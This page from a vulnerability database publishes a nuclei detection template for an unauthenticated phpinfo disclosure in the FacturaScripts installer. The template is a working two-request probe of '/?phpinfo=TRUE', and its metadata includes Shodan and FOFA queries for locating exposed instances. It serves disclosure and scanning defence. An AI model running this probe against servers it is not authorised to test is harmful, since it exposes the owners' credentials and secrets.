Lucene search
+L

FacturaScripts - Unauthenticated phpinfo Disclosure

🗓️ 29 Aug 2026 10:07:28Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 5 Views

Unauthenticated phpinfo disclosure in FacturaScripts exposes PHP config and secrets.

Related
Refs
Code
id: CVE-2026-42878

info:
  name: FacturaScripts - Unauthenticated phpinfo Disclosure
  author: ChrisJr404
  severity: medium
  description: |
    Detected FacturaScripts exposes a debug branch in the Installer controller that calls phpinfo() when the request carries the phpinfo=TRUE query parameter, and on an instance that has not finished installation, this endpoint was reachable without authentication.
  impact: |
    Remote attackers can access sensitive PHP configuration and environment variables, exposing credentials and secrets.
  remediation: |
    Update to version 2026 or later.
  reference:
    - https://github.com/advisories/GHSA-vrxf-vrc4-22p7
    - https://github.com/NeoRazorX/facturascripts/blob/master/Core/Controller/Installer.php
    - https://nvd.nist.gov/vuln/detail/CVE-2026-42878
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2026-42878
    epss-score: 0.00552
    epss-percentile: 0.43671
    cwe-id: CWE-200
  metadata:
    verified: true
    max-request: 2
    vendor: facturascripts
    product: facturascripts
    shodan-query: html:"FacturaScripts installer"
    fofa-query: body="FacturaScripts installer"
  tags: cve,cve2026,facturascripts,phpinfo,exposure,disclosure,unauth

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}"

    matchers:
      - type: dsl
        internal: true
        dsl:
          - "status_code == 200"
          - "contains(body, \"FacturaScripts installer\")"
        condition: and

  - method: GET
    path:
      - "{{BaseURL}}/?phpinfo=TRUE"

    matchers:
      - type: dsl
        dsl:
          - "status_code == 200"
          - "contains_all(to_lower(body), \"phpinfo()</title>\", \"php version\")"
        condition: and
# digest: 4a0a00473045022100a38852561262f01522727ae4a6affba0c1f0ddd93890a4059993d8821a1693c10220534bfa4cf1fe58d3030b087cfd0e5c161fdf3c212810d10500a12a2c01ec76db:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Aug 2026 19:46Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.15.3
EPSS0.00552
SSVC
5